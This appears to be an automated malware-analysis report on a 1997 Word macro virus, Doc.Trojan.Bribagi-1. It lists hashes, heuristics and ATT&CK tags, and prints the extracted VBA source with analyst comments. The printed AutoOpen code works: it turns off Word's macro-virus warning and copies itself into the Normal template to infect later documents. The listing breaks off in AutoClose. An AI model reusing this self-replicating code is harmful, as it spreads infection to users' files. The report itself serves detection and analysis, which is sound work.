Bribagi — Office (OLE) malware analysis

Static analysis result for SHA-256 a402f246b7534b5d…

MALICIOUS

Office (OLE)

43.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 40f080f6fb18080e71980016a2d6bb7d SHA-1: 6331e56b48138f5e41d9c7c8c94e0dc12b313e04 SHA-256: a402f246b7534b5d5e8b97ac9eef8128d9b9e8c4ec4ecef20390ac6c2f9816ee
180 Risk Score

Malware Insights

Bribagi · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Bribagi-1. Static analysis revealed the presence of legacy WordBasic and VBA macros, specifically an AutoOpen macro, which is a common technique for initial execution. The AutoOpen macro is designed to copy itself and potentially other malicious components, as indicated by the references to WR0001.txt and WR0002.log, suggesting downloader or dropper functionality.

Heuristics 5

  • ClamAV: Doc.Trojan.Bribagi-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bribagi-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29099 bytes
SHA-256: db7677c991ca28c8fae0eefc840eb27df697d5ee44a22fe85a1759dd371bb752
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' olevba export header for the document's own ThisDocument module. No
' procedures are shown for it in this preview; all recovered code lives in
' the "Personal" module that follows.

Attribute VB_Name = "Personal"
' Module-level state for the "Personal" module -- the unit that AutoOpen
' moves between the document and the attached template with OrganizerCopy.
' WR0005 / WR0006: output file paths consumed by BRiBAGI below. They are
'   not assigned anywhere in the visible part of the listing; presumably
'   set by a routine in the truncated remainder (verify).
' a(1000) / Stcnt: not referenced by any procedure visible here.
Dim WR0005 As String, WR0006 As String, a(1000) As String, Stcnt As Integer
' Enumerates one directory (no recursion -- the routine never calls itself)
' and appends each entry to one of two listing files: sub-directory paths,
' with a trailing "\", go to the file named by WR0005; plain file paths go
' to the file named by WR0006.
' MyPass: directory to enumerate. It is concatenated directly with each
'   entry name, so it appears to be expected to end in a path separator.
' Not called from any code visible in this preview. The enumerated files
' are never opened or read; the only artifacts are the two append-only
' listing files.
Sub BRiBAGI(MyPass As String)

MyNam = Dir(MyPass, vbDirectory)
Do While MyNam <> ""
    ' Skip the self/parent entries and the Windows page file.
    If MyNam <> "." And MyNam <> ".." And MyNam <> "pagefile.sys" Then
        If (GetAttr(MyPass & MyNam) And vbDirectory) = vbDirectory Then
            Open WR0005 For Append As #1
                Write #1, MyPass & MyNam & "\"
            Close #1
        Else
            Open WR0006 For Append As #1
                Write #1, MyPass & MyNam
            Close #1
        End If
    End If
    MyNam = Dir
Loop

End Sub

' Auto-exec entry point, run when the document is opened. Observed steps:
'  1. turns off Word's macro-virus warning (Options.VirusProtection) and
'     forces the attached template to Normal;
'  2. copies this "Personal" module from the document into the template
'     with OrganizerCopy and saves the template;
'  3. appends today's date to WR0002.log in the root of the template's drive;
'  4. copies the module from the template back into the document and saves;
'  5. in the shared error/fall-through block, compares the embedded version
'     (1.01) with the number stored in WR0001.txt beside the template and
'     re-plants the template copy when the document carries the newer one.
' Detection / mitigation hooks visible here: changes to the Normal
' template's project items, creation of WR0001.txt / WR0002.log, and the
' VirusProtection toggle. "Normal.Personal.DWri" and "Normal.Personal.DOpen"
' are invoked by name but are not defined in the visible listing.
Sub AutoOpen()
'
' BRiBAGI,1.01
'
    ' Disable Word's built-in macro warning for the duration of the routine.
    Options.VirusProtection = False
    With ActiveDocument
        .UpdateStylesOnOpen = False
        .AttachedTemplate = "Normal"
    End With

    ' f$ = full path of the open document. A path ending in "\" is a drive
    ' root, so it is cut back to the drive letter before "\" is re-appended.
    f$ = ActiveDocument.Path
    If Right$(f$, 1) = "\" Then f$ = Left$(f$, 2)
    f$ = f$ & "\" & ActiveDocument.Name
    ' N$ = full path of the attached (Normal) template. N1$ is a version
    ' file beside the template; N2$ is a date log in the root of its drive.
    N$ = ActiveDocument.AttachedTemplate.Path
    If Right$(N$, 1) = "\" Then N$ = Left$(N$, 2)
    N1$ = N$ & "\WR0001.txt"
    N2$ = Left$(N$, 2) & "\WR0002.log"
    N$ = N$ & "\" & ActiveDocument.AttachedTemplate.Name
    ' Phase flags read by the errhandler block below:
    '   EFlag        - 1 once the document-to-template phase is over
    '   FFlag/FFlag1 - 1 once that phase completed without error
    '   DFlag        - 1 once the template-to-document copy completed
    EFlag = 0

    FFlag = 0: FFlag1 = 0
    On Error GoTo errhandler
        ' Document -> template: plant the "Personal" module in Normal.
        Application.OrganizerCopy Source:=f$, Destination:=N$ _
            , Name:="Personal", Object:=wdOrganizerObjectProjectItems
        Set MyTemplate = ActiveDocument.AttachedTemplate
        MyTemplate.Save
        ' Append today's date to WR0002.log; LOF(1) is the size before the
        ' write. Past 80 bytes the first recorded date is read back and
        ' appended again with today's date. The file is never truncated
        ' here, so it only grows.
        MyDate = Date
        Open N2$ For Append As #1
            FScale = LOF(1)
            Write #1, MyDate
        Close #1
        If FScale > 80 Then
            Open N2$ For Input As #1
                Input #1, ODate
            Close #1
            Open N2$ For Append As #1
                Write #1, ODate
                Write #1, MyDate
            Close #1
        End If
        ' Read-only document: restore the warning setting and stop before
        ' the template-to-document copy.
        If GetAttr(f$) = vbReadOnly Then
            Options.VirusProtection = True
            Exit Sub
        End If
    FFlag = 1: FFlag1 = 1
resume1:
    ' Template -> document. Reached by fall-through, or by Resume from the
    ' handler when the first phase raised an error.
    DFlag = 0: EFlag = 1
        Application.OrganizerCopy Source:=N$, Destination:=f$ _
            , Name:="Personal", Object:=wdOrganizerObjectProjectItems
        ActiveDocument.Save
    DFlag = 1

errhandler:
    ' No Exit Sub precedes this label, so the block also runs on the
    ' success path; the flags decide what it does.
    If FFlag1 = 0 And EFlag = 0 Then
        Resume resume1
    End If
    ' Neither copy phase completed: version check against WR0001.txt.
    If FFlag = 0 And DFlag = 0 Then
        FVsn = 1.01: DVsn = 0
        Application.Run MacroName:="Normal.Personal.DWri"
        Open N1$ For Input As #1
            Input #1, DVsn
        Close #1
        If FVsn > DVsn Then
            ' Document copy is newer: replace the template's module and
            ' repeat the date-log step (threshold 300 bytes this time).
            Application.OrganizerDelete Source:=N$ _
                , Name:="Personal", Object:=wdOrganizerObjectProjectItems
            Application.OrganizerCopy Source:=f$, Destination:=N$ _
                , Name:="Personal", Object:=wdOrganizerObjectProjectItems
            Set MyTemplate = ActiveDocument.AttachedTemplate
            MyTemplate.Save
            MyDate = Date
            Open N2$ For Append As #1
                FScale = LOF(1)
                Write #1, MyDate
            Close #1
            If FScale > 300 Then
                Open N2$ For Input As #1
                    Input #1, ODate
                Close #1
                Open N2$ For Append As #1
                    Write #1, ODate
                    Write #1, MyDate
                Close #1
            End If
        ElseIf FVsn < DVsn Then
            ' Template already carries a newer version: hand over to it.
            Application.Run MacroName:="Normal.Personal.DOpen"
        End If
    End If
    ' Restore the macro warning before returning.
    Options.VirusProtection = True
End Sub
Sub AutoClose()
    
    Options.VirusProtection = False
    With ActiveDocument
        .UpdateStylesOnOpen = False
        .AttachedTemplate = "Normal"
    End With

    f$ = ActiveDocument.Path
    If Right$(f$, 1) = "\" Then f$ = Left$(f$, 2)
    f$ = f$ & "\" & ActiveDocument.
... (truncated)